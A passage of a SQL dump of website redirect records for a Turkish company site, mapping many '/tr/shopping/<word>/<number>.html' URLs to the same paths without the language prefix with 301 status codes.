00:00:00',301),(75404,'https://3s-technologies.com.tr/tr/shopping/carpus/740398708.html',NULL,'https://3s-technologies.com.tr/shopping/carpus/740398708.html','',1,0,'2026-06-11 07:34:07','0000-00-00 00:00:00',301),(75405,'https://3s-technologies.com.tr/tr/shopping/spinose/3429960049.html',NULL,'https://3s-technologies.com.tr/shopping/spinose/3429960049.html','',1,0,'2026-06-11 07:34:10','0000-00-00 00:00:00',301),(75406,'https://3s-technologies.com.tr/tr/shopping/slanderous/1148372287.html',NULL,'https://3s-technologies.com.tr/shopping/slanderous/1148372287.html','',1,0,'2026-06-11 07:34:13','0000-00-00 00:00:00',301),(75407,'https://3s-technologies.com.tr/tr/shopping/phosphame/587450320.html',NULL,'https://3s-technologies.com.tr/shopping/phosphame/587450320.html','',1,0,'2026-06-11 07:34:16','0000-00-00 00:00:00',301),(75408,'https://3s-technologies.com.tr/tr/shopping/chamberlain/3235991769.html',NULL,'https://3s-technologies.com.tr/shopping/chamberlain/3235991769.html','',1,0,'2026-06-11 07:34:19','0000-00-00 00:00:00',301),(75409,'https://3s-technologies.com.tr/tr/shopping/gerascanthoides/1005837397.html',NULL,'https://3s-technologies.com.tr/shopping/gerascanthoides/1005837397.html','',1,0,'2026-06-11 07:34:22','0000-00-00 00:00:00',301),(75410,'https://3s-technologies.com.tr/tr/shopping/hemstitched/2943764882.html',NULL,'https://3s-technologies.com.tr/shopping/hemstitched/2943764882.html','',1,0,'2026-06-11 07:34:25','0000-00-00 00:00:00',301),(75411,'https://3s-technologies.com.tr/tr/shopping/mystifying/3852536654.html',NULL,'https://3s-technologies.com.tr/shopping/mystifying/3852536654.html','',1,0,'2026-06-11 07:34:28','0000-00-00 00:00:00',301),(75412,'https://3s-technologies.com.tr/tr/shopping/modernly/1383133184.html',NULL,'https://3s-technologies.com.tr/shopping/modernly/1383133184.html','',1,0,'2026-06-11 07:34:32','0000-00-00 00:00:00',301),(75413,'https://3s-technologies.com.tr/tr/shopping/acrite/2708776742.html',NULL,'https://3s-technologies.com.tr/shopping/acrite/2708776742.html','',1,0,'2026-06-11 07:34:34','0000-00-00 00:00:00',301),(75414,'https://3s-technologies.com.tr/tr/shopping/impregnably/1442505997.html',NULL,'https://3s-technologies.com.tr/shopping/impregnably/1442505997.html','',1,0,'2026-06-11 07:34:40','0000-00-00 00:00:00',301),(75415,'https://3s-technologies.com.tr/tr/shopping/tychism/128228443.html',NULL,'https://3s-technologies.com.tr/shopping/tychism/128228443.html','',1,0,'2026-06-11 07:34:43','0000-00-00 00:00:00',301),(75416,'https://3s-technologies.com.tr/tr/shopping/citation/906460919.html',NULL,'https://3s-technologies.com.tr/shopping/citation/906460919.html','',1,0,'2026-06-11 07:34:46','0000-00-00 00:00:00',301),(75417,'https://3s-technologies.com.tr/tr/shopping/countermining/3425207722.html',NULL,'https://3s-technologies.com.tr/shopping/countermining/3425207722.html','',1,0,'2026-06-11 07:34:49','0000-00-00 00:00:00',301),(75418,'https://3s-technologies.com.tr/tr/shopping/uncertain/3936002673.html',NULL,'https://3s-technologies.com.tr/shopping/uncertain/3936002673.html','',1,0,'2026-06-11 07:34:52','0000-00-00 00:00:00',301),(75419,'https://3s-technologies.com.tr/tr/shopping/change/4277725587.html',NULL,'https://3s-technologies.com.tr/shopping/change/4277725587.html','',1,0,'2026-06-11 07:34:55','0000-00-00 00:00:00',301),(75420,'https://3s-technologies.com.tr/tr/shopping/philippium/2557785071.html',NULL,'https://3s-technologies.com.tr/shopping/philippium/2557785071.html','',1,0,'2026-06-11 07:34:58','0000-00-00 00:00:00',301),(75421,'https://3s-technologies.com.tr/tr/shopping/homebuilder/3665769522.html',NULL,'https://3s-technologies.com.tr/shopping/homebuilder/3665769522.html','',1,0,'2026-06-11 07:35:01','0000-00-00 00:00:00',301),(75422,'https://3s-technologies.com.tr/tr/shopping/larval/2033946734.html',NULL,'https://3s-technologies.com.tr/shopping/larval/2033946734.html','',1,0,'2026-06-11 07:35:04','0000-00-00 00:00:00',301),(75423,'https://3s-technologies.com.tr/tr/shopping/honoring/3015676734.html',NULL,'https://3s-technologies.com.tr/shopping/honoring/3015676734.html','',1,0,'2026-06-11 07:35:07','0000-00-00 00:00:00',301),(75424,'https://3s-technologies.com.tr/tr/shopping/hault/207662146.html',NULL,'https://3s-technologies.com.tr/shopping/hault/207662146.html','',1,0,'2026-06-11 07:35:10','0000-00-00 00:00:00',301),(75425,'https://3s-technologies.com.tr/tr/shopping/buster/2165486966.html',NULL,'https://3s-technologies.com.tr/shopping/buster/2165486966.html','',1,0,'2026-06-11 07:35:13','0000-00-00 00:00:00',301),(75426,'https://3s-technologies.com.tr/tr/shopping/saute/351876584.html',NULL,'https://3s-technologies.com.tr/shopping/saute/351876584.html','',1,0,'2026-06-11 07:35:17','0000-00-00 00:00:00',301),(75427,'https://3s-technologies.com.tr/tr/shopping/demicadence/2188193.html',NULL,'https://3s-technologies.com.tr/shopping/demicadence/2188193.html','',1,0,'2026-06-11 07:35:19','0000-00-00 00:00:00',301),(75428,'https://3s-technologies.com.tr/tr/shopping/rectress/2478351352.html',NULL,'https://3s-technologies.com.tr/shopping/rectress/2478351352.html','',1,0,'2026-06-11 07:35:22','0000-00-00 00:00:00',301),(75429,'https://3s-technologies.com.tr/tr/shopping/wheeze/1847171060.html',NULL,'https://3s-technologies.com.tr/shopping/wheeze/1847171060.html','',1,0,'2026-06-11 07:35:25','0000-00-00 00:00:00',301),(75430,'https://3s-technologies.com.tr/tr/shopping/bridecake/4085921913.html',NULL,'https://3s-technologies.com.tr/shopping/bridecake/4085921913.html','',1,0,'2026-06-11 07:35:28','0000-00-00 00:00:00',301),(75431,'https://3s-technologies.com.tr/tr/shopping/mollinet/51173514.html',NULL,'https://3s-technologies.com.tr/shopping/mollinet/51173514.html','',1,0,'2026-06-11 07:35:31','0000-00-00 00:00:00',301),(75432,'https://3s-technologies.com.tr/tr/shopping/inglorious/2647788053.html',NULL,'https://3s-technologies.com.tr/shopping/inglorious/2647788053.html','',1,0,'2026-06-11 07:35:34','0000-00-00 00:00:00',301),(75433,'https://3s-technologies.com.tr/tr/shopping/pythias/742563314.html',NULL,'https://3s-technologies.com.tr/shopping/pythias/742563314.html','',1,0,'2026-06-11 07:35:37','0000-00-00 00:00:00',301),(75434,'https://3s-technologies.com.tr/tr/shopping/byname/1402045679.html',NULL,'https://3s-technologies.com.tr/shopping/byname/1402045679.html','',1,0,'2026-06-11 07:35:40','0000-00-00 00:00:00',301),(75435,'https://3s-technologies.com.tr/tr/shopping/subacetate/1994925742.html',NULL,'https://3s-technologies.com.tr/shopping/subacetate/1994925742.html','',1,0,'2026-06-11 07:35:43','0000-00-00 00:00:00',301),(75436,'https://3s-technologies.com.tr/tr/shopping/drawee/2383727201.html',NULL,'https://3s-technologies.com.tr/shopping/drawee/2383727201.html','',1,0,'2026-06-11 07:35:46','0000-00-00 00:00:00',301),(75437,'https://3s-technologies.com.tr/tr/shopping/minish/230210922.html',NULL,'https://3s-technologies.com.tr/shopping/minish/230210922.html','',1,0,'2026-06-11 07:35:49','0000-00-00 00:00:00',301),(75438,'https://3s-technologies.com.tr/tr/shopping/reclaiming/1836236149.html',NULL,'https://3s-technologies.com.tr/shopping/reclaiming/1836236149.html','',1,0,'2026-06-11 07:35:53','0000-00-00 00:00:00',301),(75439,'https://3s-technologies.com.tr/tr/shopping/rummaging/1039284729.html',NULL,'https://3s-technologies.com.tr/shopping/rummaging/1039284729.html','',1,0,'2026-06-11 07:35:56','0000-00-00 00:00:00',301),(75440,'https://3s-technologies.com.tr/tr/shopping/facilitate/976371704.html',NULL,'https://3s-technologies.com.tr/shopping/facilitate/976371704.html','',1,0,'2026-06-11 07:35:59','0000-00-00 00:00:00',301),(75441,'https://3s-technologies.com.tr/tr/shopping/illatively/1364402508.html',NULL,'https://3s-technologies.com.tr/shopping/illatively/1364402508.html','',1,0,'2026-06-11 07:36:02','0000-00-00 00:00:00',301),(75442,'https://3s-technologies.com.tr/tr/shopping/meteor/2504622191.html',NULL,'https://3s-technologies.com.tr/shopping/meteor/2504622191.html','',1,0,'2026-06-11 07:36:05','0000-00-00 00:00:00',301),(75443,'https://3s-technologies.com.tr/tr/shopping/rofecoxib/832435170.html',NULL,'https://3s-technologies.com.tr/shopping/rofecoxib/832435170.html','',1,0,'2026-06-11 07:36:08','0000-00-00 00:00:00',301),(75444,'https://3s-technologies.com.tr/tr/shopping/paltrily/1857724274.html',NULL,'https://3s-technologies.com.tr/shopping/paltrily/1857724274.html','',1,0,'2026-06-11 07:36:11','0000-00-00 00:00:00',301),(75445,'https://3s-technologies.com.tr/tr/shopping/parallels/2282400333.html',NULL,'https://3s-technologies.com.tr/shopping/parallels/2282400333.html','',1,0,'2026-06-11 07:36:14','0000-00-00 00:00:00',301),(75446,'https://3s-technologies.com.tr/tr/shopping/precipitousness/2868085575.html',NULL,'https://3s-technologies.com.tr/shopping/precipitousness/2868085575.html','',1,0,'2026-06-11 07:36:17','0000-00-00 00:00:00',301),(75447,'https://3s-technologies.com.tr/tr/shopping/echelon/743775397.html',NULL,'https://3s-technologies.com.tr/shopping/echelon/743775397.html','',1,0,'2026-06-11 07:36:20','0000-00-00 00:00:00',301),(75448,'https://3s-technologies.com.tr/tr/shopping/wheelswarf/4138099937.html',NULL,'https://3s-technologies.com.tr/shopping/wheelswarf/4138099937.html','',1,0,'2026-06-11 07:36:23','0000-00-00 00:00:00',301),(75449,'https://3s-technologies.com.tr/tr/shopping/irrorated/858082747.html',NULL,'https://3s-technologies.com.tr/shopping/irrorated/858082747.html','',1,0,'2026-06-11 07:36:26','0000-00-00 00:00:00',301),(75450,'https://3s-technologies.com.tr/tr/shopping/phallus/3577551176.html',NULL,'https://3s-technologies.com.tr/shopping/phallus/3577551176.html','',1,0,'2026-06-11 07:36:30','0000-00-00 00:00:00',301),(75451,'https://3s-technologies.com.tr/tr/shopping/diegesis/2241166273.html',NULL,'https://3s-technologies.com.tr/shopping/diegesis/2241166273.html','',1,0,'2026-06-11 07:36:33','0000-00-00 00:00:00',301),(75452,'https://3s-technologies.com.tr/tr/shopping/roundure/1076069669.html',NULL,'https://3s-technologies.com.tr/shopping/roundure/1076069669.html','',1,0,'2026-06-11 07:36:36','0000-00-00 00:00:00',301),(75453,'https://3s-technologies.com.tr/tr/shopping/salting/3594810161.html',NULL,'https://3s-technologies.com.tr/shopping/salting/3594810161.html','',1,0,'2026-06-11 07:36:39','0000-00-00 00:00:00',301),(75454,'https://3s-technologies.com.tr/tr/shopping/normotensive/3846572228.html',NULL,'https://3s-technologies.com.tr/shopping/normotensive/3846572228.html','',1,0,'2026-06-11 07:36:42','0000-00-00 00:00:00',301),(75455,'https://3s-technologies.com.tr/tr/shopping/protracter/1415204894.html',NULL,'https://3s-technologies.com.tr/shopping/protracter/1415204894.html','',1,0,'2026-06-11 07:36:45','0000-00-00 00:00:00',301),(75456,'https://3s-technologies.com.tr/tr/shopping/luxive/3974202316.html',NULL,'https://3s-technologies.com.tr/shopping/luxive/3974202316.html','',1,0,'2026-06-11 07:36:48','0000-00-00 00:00:00',301),(75457,'https://3s-technologies.com.tr/tr/shopping/lightblue/2212307729.html',NULL,'https://3s-technologies.com.tr/shopping/lightblue/2212307729.html','',1,0,'2026-06-11 07:36:51','0000-00-00 00:00:00',301),(75458,'https://3s-technologies.com.tr/tr/shopping/ungenerous/929009727.html',NULL,'https://3s-technologies.com.tr/shopping/ungenerous/929009727.html','',1,0,'2026-06-11 07:36:54','0000-00-00 00:00:00',301),(75459,'https://3s-technologies.com.tr/tr/shopping/trephining/1513976406.html',NULL,'https://3s-technologies.com.tr/shopping/trephining/1513976406.html','',1,0,'2026-06-11 07:36:57','0000-00-00 00:00:00',301),(75460,'https://3s-technologies.com.tr/tr/shopping/monocrat/225622134.html',NULL,'https://3s-technologies.com.tr/shopping/monocrat/225622134.html','',1,0,'2026-06-11 07:37:00','0000-00-00 00:00:00',301),(75461,'https://3s-technologies.com.tr/tr/shopping/preconize/3541679662.html',NULL,'https://3s-technologies.com.tr/shopping/preconize/3541679662.html','',1,0,'2026-06-11 07:37:03','0000-00-00 00:00:00',301),(75462,'https://3s-technologies.com.tr/tr/shopping/mechanizing/2649000152.html',NULL,'https://3s-technologies.com.tr/shopping/mechanizing/2649000152.html','',1,0,'2026-06-11 07:37:06','0000-00-00 00:00:00',301),(75463,'https://3s-technologies.com.tr/tr/shopping/centring/3083130940.html',NULL,'https://3s-technologies.com.tr/shopping/centring/3083130940.html','',1,0,'2026-06-11 07:37:09','0000-00-00 00:00:00',301),(75464,'https://3s-technologies.com.tr/tr/shopping/processionea/3427372312.html',NULL,'https://3s-technologies.com.tr/shopping/processionea/3427372312.html','',1,0,'2026-06-11 07:37:12','0000-00-00 00:00:00',301),(75465,'https://3s-technologies.com.tr/tr/shopping/equidae/1922623124.html',NULL,'https://3s-technologies.com.tr/shopping/equidae/1922623124.html','',1,0,'2026-06-11 07:37:15','0000-00-00 00:00:00',301),(75466,'https://3s-technologies.com.tr/tr/shopping/surefooted/1653202812.html',NULL,'https://3s-technologies.com.tr/shopping/surefooted/1653202812.html','',1,0,'2026-06-11 07:37:18','0000-00-00 00:00:00',301),(75467,'https://3s-technologies.com.tr/tr/shopping/cangue/684680488.html',NULL,'https://3s-technologies.com.tr/shopping/cangue/684680488.html','',1,0,'2026-06-11 07:37:21','0000-00-00 00:00:00',301),(75468,'https://3s-technologies.com.tr/tr/shopping/taper/2647624546.html',NULL,'https://3s-technologies.com.tr/shopping/taper/2647624546.html','',1,0,'2026-06-11 07:37:24','0000-00-00 00:00:00',301),(75469,'https://3s-technologies.com.tr/tr/shopping/numberer/2571945239.html',NULL,'https://3s-technologies.com.tr/shopping/numberer/2571945239.html','',1,0,'2026-06-11 07:37:27','0000-00-00 00:00:00',301),(75470,'https://3s-technologies.com.tr/tr/shopping/milan/4095867962.html',NULL,'https://3s-technologies.com.tr/shopping/milan/4095867962.html','',1,0,'2026-06-11 07:37:30','0000-00-00 00:00:00',301),(75471,'https://3s-technologies.com.tr/tr/shopping/incogitative/202909835.html',NULL,'https://3s-technologies.com.tr/shopping/incogitative/202909835.html','',1,0,'2026-06-11 07:37:33','0000-00-00 00:00:00',301),(75472,'https://3s-technologies.com.tr/tr/shopping/baronial/153319548.html',NULL,'https://3s-technologies.com.tr/shopping/baronial/153319548.html','',1,0,'2026-06-11 07:37:36','0000-00-00 00:00:00',301),(75473,'https://3s-technologies.com.tr/tr/shopping/peregrinity/3395137079.html',NULL,'https://3s-technologies.com.tr/shopping/peregrinity/3395137079.html','',1,0,'2026-06-11 07:37:39','0000-00-00 00:00:00',301),(75474,'https://3s-technologies.com.tr/tr/shopping/poser/3701544951.html',NULL,'https://3s-technologies.com.tr/shopping/poser/3701544951.html','',1,0,'2026-06-11 07:37:45','0000-00-00 00:00:00',301),(75475,'https://3s-technologies.com.tr/tr/shopping/costiveness/2135503899.html',NULL,'https://3s-technologies.com.tr/shopping/costiveness/2135503899.html','',1,0,'2026-06-11 07:37:48','0000-00-00 00:00:00',301),(75476,'https://3s-technologies.com.tr/tr/shopping/suspiciously/1577890416.html',NULL,'https://3s-technologies.com.tr/shopping/suspiciously/1577890416.html','',1,0,'2026-06-11 07:37:56','0000-00-00 00:00:00',301),(75477,'https://3s-technologies.com.tr/tr/shopping/laborsaving/4182103537.html',NULL,'https://3s-technologies.com.tr/shopping/laborsaving/4182103537.html','',1,0,'2026-06-11 07:37:59','0000-00-00 00:00:00',301),(75478,'https://3s-technologies.com.tr/tr/shopping/clinodiagonal/2264485721.html',NULL,'https://3s-technologies.com.tr/shopping/clinodiagonal/2264485721.html','',1,0,'2026-06-11 07:38:02','0000-00-00 00:00:00',301),(75479,'https://3s-technologies.com.tr/tr/shopping/parochially/837187465.html',NULL,'https://3s-technologies.com.tr/shopping/parochially/837187465.html','',1,0,'2026-06-11 07:38:05','0000-00-00 00:00:00',301),(75480,'https://3s-technologies.com.tr/tr/shopping/torbernite/3448709021.html',NULL,'https://3s-technologies.com.tr/shopping/torbernite/3448709021.html','',1,0,'2026-06-11 07:38:08','0000-00-00 00:00:00',301),(75481,'https://3s-technologies.com.tr/tr/shopping/nosed/2674484222.html',NULL,'https://3s-technologies.com.tr/shopping/nosed/2674484222.html','',1,0,'2026-06-11 07:38:11','0000-00-00 00:00:00',301),(75482,'https://3s-technologies.com.tr/tr/shopping/leftover/1170661471.html',NULL,'https://3s-technologies.com.tr/shopping/leftover/1170661471.html','',1,0,'2026-06-11 07:38:14','0000-00-00 00:00:00',301),(75483,'https://3s-technologies.com.tr/tr/shopping/terrifying/2485709696.html',NULL,'https://3s-technologies.com.tr/shopping/terrifying/2485709696.html','',1,0,'2026-06-11 07:38:17','0000-00-00 00:00:00',301),(75484,'https://3s-technologies.com.tr/tr/shopping/axmen/2974397266.html',NULL,'https://3s-technologies.com.tr/shopping/axmen/2974397266.html','',1,0,'2026-06-11 07:38:20','0000-00-00 00:00:00',301),(75485,'https://3s-technologies.com.tr/tr/shopping/malayalam/1654414911.html',NULL,'https://3s-technologies.com.tr/shopping/malayalam/1654414911.html','',1,0,'2026-06-11 07:38:23','0000-00-00 00:00:00',301),(75486,'https://3s-technologies.com.tr/tr/shopping/braccate/2773902835.html',NULL,'https://3s-technologies.com.tr/shopping/braccate/2773902835.html','',1,0,'2026-06-11 07:38:26','0000-00-00 00:00:00',301),(75487,'https://3s-technologies.com.tr/tr/shopping/integumentation/3163776726.html',NULL,'https://3s-technologies.com.tr/shopping/integumentation/3163776726.html','',1,0,'2026-06-11 07:38:31','0000-00-00 00:00:00',301),(75488,'https://3s-technologies.com.tr/tr/shopping/tailing/4178563325.html',NULL,'https://3s-technologies.com.tr/shopping/tailing/4178563325.html','',1,0,'2026-06-11 07:38:34','0000-00-00 00:00:00',301),(75489,'https://3s-technologies.com.tr/tr/shopping/protometals/1644072843.html',NULL,'https://3s-technologies.com.tr/shopping/protometals/1644072843.html','',1,0,'2026-06-11 07:38:37','0000-00-00 00:00:00',301),(75490,'https://3s-technologies.com.tr/tr/shopping/bluiter/1001085102.html',NULL,'https://3s-technologies.com.tr/shopping/bluiter/1001085102.html','',1,0,'2026-06-11 07:38:40','0000-00-00 00:00:00',301),(75491,'https://3s-technologies.com.tr/tr/shopping/successless/312628381.html',NULL,'https://3s-technologies.com.tr/shopping/successless/312628381.html','',1,0,'2026-06-11 07:38:43','0000-00-00 00:00:00',301),(75492,'https://3s-technologies.com.tr/tr/shopping/corallian/1421169288.html',NULL,'https://3s-technologies.com.tr/shopping/corallian/1421169288.html','',1,0,'2026-06-11 07:38:46','0000-00-00 00:00:00',301),(75493,'https://3s-technologies.com.tr/tr/shopping/telltale/246353877.html',NULL,'https://3s-technologies.com.tr/shopping/telltale/246353877.html','',1,0,'2026-06-11 07:38:49','0000-00-00 00:00:00',301),(75494,'https://3s-technologies.com.tr/tr/shopping/profilist/546430460.html',NULL,'https://3s-technologies.com.tr/shopping/profilist/546430460.html','',1,0,'2026-06-11 07:38:52','0000-00-00 00:00:00',301),(75495,'https://3s-technologies.com.tr/tr/shopping/scarped/1362074395.html',NULL,'https://3s-technologies.com.tr/shopping/scarped/1362074395.html','',1,0,'2026-06-11 07:38:55','0000-00-00 00:00:00',301),(75496,'https://3s-technologies.com.tr/tr/shopping/cadent/3064218445.html',NULL,'https://3s-technologies.com.tr/shopping/cadent/3064218445.html','',1,0,'2026-06-11 07:38:58','0000-00-00 00:00:00',301),(75497,'https://3s-technologies.com.tr/tr/shopping/dukedom/3815549094.html',NULL,'https://3s-technologies.com.tr/shopping/dukedom/3815549094.html','',1,0,'2026-06-11 07:39:01','0000-00-00 00:00:00',301),(75498,'https://3s-technologies.com.tr/tr/shopping/wintertide/2522140768.html',NULL,'https://3s-technologies.com.tr/shopping/wintertide/2522140768.html','',1,0,'2026-06-11 07:39:04','0000-00-00 00:00:00',301),(75499,'https://3s-technologies.com.tr/tr/shopping/pomely/1834404794.html',NULL,'https://3s-technologies.com.tr/shopping/pomely/1834404794.html','',1,0,'2026-06-11 07:39:08','0000-00-00 00:00:00',301),(75500,'https://3s-technologies.com.tr/tr/shopping/inveil/3452249233.html',NULL,'https://3s-technologies.com.tr/shopping/inveil/3452249233.html','',1,0,'2026-06-11 07:39:11','0000-00-00 00:00:00',301),(75501,'https://3s-technologies.com.tr/tr/shopping/annalize/3687010130.html',NULL,'https://3s-technologies.com.tr/shopping/annalize/3687010130.html','',1,0,'2026-06-11 07:39:14','0000-00-00 00:00:00',301),(75502,'https://3s-technologies.com.tr/tr/shopping/diameters/3324437342.html',NULL,'https://3s-technologies.com.tr/shopping/diameters/3324437342.html','',1,0,'2026-06-11 07:39:17','0000-00-00 00:00:00',301),(75503,'https://3s-technologies.com.tr/tr/shopping/chondrus/709115982.html',NULL,'https://3s-technologies.com.tr/shopping/chondrus/709115982.html','',1,0,'2026-06-11 07:39:20','0000-00-00 00:00:00',301),(75504,'https://3s-technologies.com.tr/tr/shopping/psila/2727084303.html',NULL,'https://3s-technologies.com.tr/shopping/psila/2727084303.html','',1,0,'2026-06-11 07:39:23','0000-00-00 00:00:00',301),(75505,'https://3s-technologies.com.tr/tr/shopping/brideale/2745044291.html',NULL,'https://3s-technologies.com.tr/shopping/brideale/2745044291.html','',1,0,'2026-06-11 07:39:26','0000-00-00 00:00:00',301),(75506,'https://3s-technologies.com.tr/tr/shopping/sullage/591086601.html',NULL,'https://3s-technologies.com.tr/shopping/sullage/591086601.html','',1,0,'2026-06-11 07:39:29','0000-00-00 00:00:00',301),(75507,'https://3s-technologies.com.tr/tr/shopping/coralligenous/3798801189.html',NULL,'https://3s-technologies.com.tr/shopping/coralligenous/3798801189.html','',1,0,'2026-06-11 07:39:32','0000-00-00 00:00:00',301),(75508,'https://3s-technologies.com.tr/tr/shopping/particularment/1435329488.html',NULL,'https://3s-technologies.com.tr/shopping/particularment/1435329488.html','',1,0,'2026-06-11 07:39:35','0000-00-00 00:00:00',301),(75509,'https://3s-technologies.com.tr/tr/shopping/slabsided/3498235588.html',NULL,'https://3s-technologies.com.tr/shopping/slabsided/3498235588.html','',1,0,'2026-06-11 07:39:38','0000-00-00 00:00:00',301),(75510,'https://3s-technologies.com.tr/tr/shopping/ceruse/3931413885.html',NULL,'https://3s-technologies.com.tr/shopping/ceruse/3931413885.html','',1,0,'2026-06-11 07:39:43','0000-00-00 00:00:00',301),(75511,'https://3s-technologies.com.tr/tr/shopping/brill/2326007898.html',NULL,'https://3s-technologies.com.tr/shopping/brill/2326007898.html','',1,0,'2026-06-11 07:39:47','0000-00-00 00:00:00',301),(75512,'https://3s-technologies.com.tr/tr/shopping/placodermi/3808536124.html',NULL,'https://3s-technologies.com.tr/shopping/placodermi/3808536124.html','',1,0,'2026-06-11 07:39:50','0000-00-00 00:00:00',301),(75513,'https://3s-technologies.com.tr/tr/shopping/fortread/3013252520.html',NULL,'https://3s-technologies.com.tr/shopping/fortread/3013252520.html','',1,0,'2026-06-11 07:39:53','0000-00-00 00:00:00',301),(75514,'https://3s-technologies.com.tr/tr/shopping/auxiliary/3333778425.html',NULL,'https://3s-technologies.com.tr/shopping/auxiliary/3333778425.html','',1,0,'2026-06-11 07:39:59','0000-00-00 00:00:00',301),(75515,'https://3s-technologies.com.tr/tr/shopping/slighty/2360667345.html',NULL,'https://3s-technologies.com.tr/shopping/slighty/2360667345.html','',1,0,'2026-06-11 07:40:03','0000-00-00 00:00:00',301),(75516,'https://3s-technologies.com.tr/tr/shopping/dulcite/2523352851.html',NULL,'https://3s-technologies.com.tr/shopping/dulcite/2523352851.html','',1,0,'2026-06-11 07:40:06','0000-00-00 00:00:00',301),(75517,'https://3s-technologies.com.tr/tr/shopping/baetuli/1381757546.html',NULL,'https://3s-technologies.com.tr/shopping/baetuli/1381757546.html','',1,0,'2026-06-11 07:40:09','0000-00-00 00:00:00',301),(75518,'https://3s-technologies.com.tr/tr/shopping/albyn/148567221.html',NULL,'https://3s-technologies.com.tr/shopping/albyn/148567221.html','',1,0,'2026-06-11 07:40:12','0000-00-00 00:00:00',301),(75519,'https://3s-technologies.com.tr/tr/shopping/haliography/1189392131.html',NULL,'https://3s-technologies.com.tr/shopping/haliography/1189392131.html','',1,0,'2026-06-11 07:40:15','0000-00-00 00:00:00',301),(75520,'https://3s-technologies.com.tr/tr/shopping/ignominious/1840369204.html',NULL,'https://3s-technologies.com.tr/shopping/ignominious/1840369204.html','',1,0,'2026-06-11 07:40:18','0000-00-00 00:00:00',301),(75521,'https://3s-technologies.com.tr/tr/shopping/muffineer/817062871.html',NULL,'https://3s-technologies.com.tr/shopping/muffineer/817062871.html','',1,0,'2026-06-11 07:40:21','0000-00-00 00:00:00',301),(75522,'https://3s-technologies.com.tr/tr/shopping/flocked/1664968109.html',NULL,'https://3s-technologies.com.tr/shopping/flocked/1664968109.html','',1,0,'2026-06-11 07:40:24','0000-00-00 00:00:00',301),(75523,'https://3s-technologies.com.tr/tr/shopping/centonism/2362831935.html',NULL,'https://3s-technologies.com.tr/shopping/centonism/2362831935.html','',1,0,'2026-06-11 07:40:28','0000-00-00 00:00:00',301),(75524,'https://3s-technologies.com.tr/tr/shopping/reposance/692809504.html',NULL,'https://3s-technologies.com.tr/shopping/reposance/692809504.html','',1,0,'2026-06-11 07:40:30','0000-00-00 00:00:00',301),(75525,'https://3s-technologies.com.tr/tr/shopping/messiah/594626829.html',NULL,'https://3s-technologies.com.tr/shopping/messiah/594626829.html','',1,0,'2026-06-11 07:40:35','0000-00-00 00:00:00',301),(75526,'https://3s-technologies.com.tr/tr/shopping/production/1099570952.html',NULL,'https://3s-technologies.com.tr/shopping/production/1099570952.html','',1,0,'2026-06-11 07:40:38','0000-00-00 00:00:00',301),(75527,'https://3s-technologies.com.tr/tr/shopping/towser/4199622114.html',NULL,'https://3s-technologies.com.tr/shopping/towser/4199622114.html','',1,0,'2026-06-11 07:40:41','0000-00-00 00:00:00',301),(75528,'https://3s-technologies.com.tr/tr/shopping/thirling/297534002.html',NULL,'https://3s-technologies.com.tr/shopping/thirling/297534002.html','',1,0,'2026-06-11 07:40:44','0000-00-00 00:00:00',301),(75529,'https://3s-technologies.com.tr/tr/shopping/adamantine/4068221533.html',NULL,'https://3s-technologies.com.tr/shopping/adamantine/4068221533.html','',1,0,'2026-06-11 07:40:47','0000-00-00 00:00:00',301),(75530,'https://3s-technologies.com.tr/tr/shopping/billard/255092746.html',NULL,'https://3s-technologies.com.tr/shopping/billard/255092746.html','',1,0,'2026-06-11 07:40:51','0000-00-00 00:00:00',301),(75531,'https://3s-technologies.com.tr/tr/shopping/clouded/2205432639.html',NULL,'https://3s-technologies.com.tr/shopping/clouded/2205432639.html','',1,0,'2026-06-11 07:40:54','0000-00-00 00:00:00',301),(75532,'https://3s-technologies.com.tr/tr/shopping/circles/3572840676.html',NULL,'https://3s-technologies.com.tr/shopping/circles/3572840676.html','',1,0,'2026-06-11 07:40:57','0000-00-00 00:00:00',301),(75533,'https://3s-technologies.com.tr/tr/shopping/pectose/1363190393.html',NULL,'https://3s-technologies.com.tr/shopping/pectose/1363190393.html','',1,0,'2026-06-11 07:41:00','0000-00-00 00:00:00',301),(75534,'https://3s-technologies.com.tr/tr/shopping/redeemability/1613395051.html',NULL,'https://3s-technologies.com.tr/shopping/redeemability/1613395051.html','',1,0,'2026-06-11 07:41:03','0000-00-00 00:00:00',301),(75535,'https://3s-technologies.com.tr/tr/shopping/humbugging/2301528877.html',NULL,'https://3s-technologies.com.tr/shopping/humbugging/2301528877.html','',1,0,'2026-06-11 07:41:06','0000-00-00 00:00:00',301),(75536,'https://3s-technologies.com.tr/tr/shopping/relaid/1558370756.html',NULL,'https://3s-technologies.com.tr/shopping/relaid/1558370756.html','',1,0,'2026-06-11 07:41:09','0000-00-00 00:00:00',301),(75537,'https://3s-technologies.com.tr/tr/shopping/antineutron/2142558680.html',NULL,'https://3s-technologies.com.tr/shopping/antineutron/2142558680.html','',1,0,'2026-06-11 07:41:12','0000-00-00 00:00:00',301),(75538,'https://3s-technologies.com.tr/tr/shopping/verdin/259681550.html',NULL,'https://3s-technologies.com.tr/shopping/verdin/259681550.html','',1,0,'2026-06-11 07:41:15','0000-00-00 00:00:00',301),(75539,'https://3s-technologies.com.tr/tr/shopping/balder/917624002.html',NULL,'https://3s-technologies.com.tr/shopping/balder/917624002.html','',1,0,'2026-06-11 07:41:18','0000-00-00 00:00:00',301),(75540,'https://3s-technologies.com.tr/tr/shopping/caeruleum/449622767.html',NULL,'https://3s-technologies.com.tr/shopping/caeruleum/449622767.html','',1,0,'2026-06-11 07:41:21','0000-00-00 00:00:00',301),(75541,'https://3s-technologies.com.tr/tr/shopping/dittos/3118653531.html',NULL,'https://3s-technologies.com.tr/shopping/dittos/3118653531.html','',1,0,'2026-06-11 07:41:24','0000-00-00 00:00:00',301),(75542,'https://3s-technologies.com.tr/tr/shopping/flowingness/2375996053.html',NULL,'https://3s-technologies.com.tr/shopping/flowingness/2375996053.html','',1,0,'2026-06-11 07:41:27','0000-00-00 00:00:00',301),(75543,'https://3s-technologies.com.tr/tr/shopping/selfdefense/2091063791.html',NULL,'https://3s-technologies.com.tr/shopping/selfdefense/2091063791.html','',1,0,'2026-06-11 07:41:30','0000-00-00 00:00:00',301),(75544,'https://3s-technologies.com.tr/tr/shopping/threehanded/1214361524.html',NULL,'https://3s-technologies.com.tr/shopping/threehanded/1214361524.html','',1,0,'2026-06-11 07:41:33','0000-00-00 00:00:00',301),(75545,'https://3s-technologies.com.tr/tr/shopping/lumberjack/3464019433.html',NULL,'https://3s-technologies.com.tr/shopping/lumberjack/3464019433.html','',1,0,'2026-06-11 07:41:36','0000-00-00 